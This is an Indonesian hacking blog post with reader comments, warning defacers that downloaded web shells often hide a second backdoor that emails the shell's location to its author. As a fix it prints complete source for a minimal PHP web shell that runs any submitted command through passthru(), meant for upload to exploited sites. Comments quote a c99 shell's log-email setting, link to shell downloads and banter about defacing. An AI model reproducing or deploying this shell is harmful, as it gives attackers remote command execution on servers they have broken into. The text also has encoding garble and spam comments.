Hati-hati terhadap Backdoor yang di-backdoor!
Cuma ingin meneruskan lidah saja dari empunya IPSECS, “who owns who?â€.
Hati-hati ya kawan-kawan bagi pecinta web-shell, php-shell atau jenis-jenis shell lainnya yang “tersebar†luas di internet. Karena tidak jarang didalam shell (baca: backdoor) tersebut ditanami backdoor lagi.
Mau bukti?
Coba deh teliti dulu setiap shell yang kita dapat dari internet. Apa bener disana gak ada backdoor’a lagi? Apa seh maksudnya?
Logikanya begini secara sistematis :
– Saya exploitasi web “A†dan memasang shell yang didapat dari web “Bâ€.
– Lalu saya upload shell’a di dalam web “Aâ€, dan muncullah link http://A.com/shell.php
– Dengan ketidaktahuan saya, ternyata kalau shell itu dipakai akan mengirimkan log ke sebuah email milik web “B†yang isinya url shell tadi.
– Ternyata si B tidak usah capek² mengupload shell, karena sudah diupload-kan oleh saya. hahahaha.
– Saya capek² mengupload’a, eh ujung²nya si “B†yang take-over semuanya. Nasiib.
Paham kan? Bagaimana solusinya? Ya coding sendiri lah! Ini ada source-code dari IPSECS
<html> <pre> - Backdoor Web Shell - <form method="POST" action="<?php $_SERVER['PHP_SELF'] ?>" > <table> <tr> <td>Command : </td> <td> </td> <td><input type="text" name="command"></td> </tr> <tr> <td> </td> <td> </td> <td><input type="submit" value="execute!"></td> </tr> </table> </form> <?php if(isset($_POST['command'])){ echo "Executing "" . $_POST['command'] . ""<BR/>\n"; if(!empty($_POST['command'])){ passthru($_POST['command']); }else{ echo "You cannot execute blank command!<BR/>\n"; } } ?> </pre> </html>
Lha saya ga ngerti yg beginian =))
klo bingung, pegangan..awas jatoh..hehehe..
nyimak doeloe ya boz…hehehehe 🙂
wew…………. ane mah sering buat yang gini………… karena kan saya gk pande SQL, RFI LFI ii gitu lah 😛 maka-a buat nya gitu…. biar gk capek2….. 😛 thanks MAHO udah di bahas… xixiixixixiix
@anharku
yups..monggo om..
@mahok
sombong :p
hem, numpang baca dulu kk :Blush:
hahahaha di aa ada2 aja nii…. gini2 aku jelaskan sedikit mengenai LOG email yg berada dlm shell
di sini aku memberikan contoh shell c99 yg ada log nya…
bisa di lihat di url sini
http://www.idasy.com/c99.txt
dor . search bagian
$log_email
di sana ada log mail yg kira2 source nya spt ini
$curdir = “./”; //start folder
//$curdir = getenv(“DOCUMENT_ROOT”);
$tmpdir = “”; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = “./”; //Directory logs of long processes (e.g. brute, scan…)
$log_email = “0xd4yx@gmail.com”; //Default e-mail for sending logs
0xd4yx@gmail.com <— ini log mail nya ….
nanti nya akan di kirimkan ke email itu apa bila kita menggunakan shell nya …
nah kalo cara aa itu buat antisipasi bnr ga a…
mungkin biar ga kena log 😀 or gmn. kurang tau juga aku ….
maklum newbie a 😀
@gusti
silahkan atuh dibaca
@bob
kebanyakan kan pada di encrypt :p
jadi klo untuk yang udah expert mah, pake php shell yang diatas aja 😀
di decode dnk say …… http://Bobyhikaru.biz/shell 😀
@boby : asumsikan ente bicara ama orang yang dibawah ente pengetahuan’a 😛
wkwkwkw..
aa juga ngerti gitu mah say :hammer
hmmm…begitu ya a’..hebat..hebat..ajarin donk 😀
apalagi yang perlu saya ajarin? hehehe..
yahhh..all about heking..pengen jadi master kayak aa’ 😀
weh..master darimana??
yang bilang saya master, itu bener2 :hoax gan!
:sup: :sup:
Yup, malah beberapa shell terkenal ada yang kayak gituan… Jadi kira2 yan aman gimana Bro?
@Cruzen
klo gitu, mendingan pake php-shell yang diatas aja bro 😀
tapi pastikan curl-nya Open :bingung
saya istilah backdoor aja kurang paham…apalagi penggunaannya 😦
nanti sama2 belajar aja kk 😀
wew, kalo kaya gitu mah nasib nasib, udah capek2 nanem shell malah orang yg seneng bukannya kita :ngakak
ya maka dari itu 😉
jangan asal pake aja 😀
hehehe..
hihihi 😀
tp kalo misalkan udah ada shell tp kita upload lagi shellnya difolder laen misalnya bisa ga?
klo backdoor wajib di pakai oleh para defacer” ya om ?
bisa aja, asalkan permission’a oke 😉
oke sip tp ga ada gunanya upload shell lagi orang shellnya udah ada 😀
wakakak sama kayak shell ane ni………. 😛
@faojand injector
iya kali gan..
itu udah bertahun-tahun yang lalu tau’a 😀
itu dulu kerjaannya om dhegleng, jaman2nya backdoor ssh root
dia nyebutnya ongkang2.tgz
edit codingan backdoor orang, sebarkan, ongkang2 terima root
😀
http://www.dhegleng.or.id/qe3/?p=221
wakakkaa..
emang bener” ongkang” ya..
hehehe.. :hammers :hammers
Keep posting stuff like this i really like it
ÐŽHola!
ЎGracias! Ahora me irй en este blog cada dнa!
[url=http://elcorucom.servecounterstrike.com/]Edwas[/url]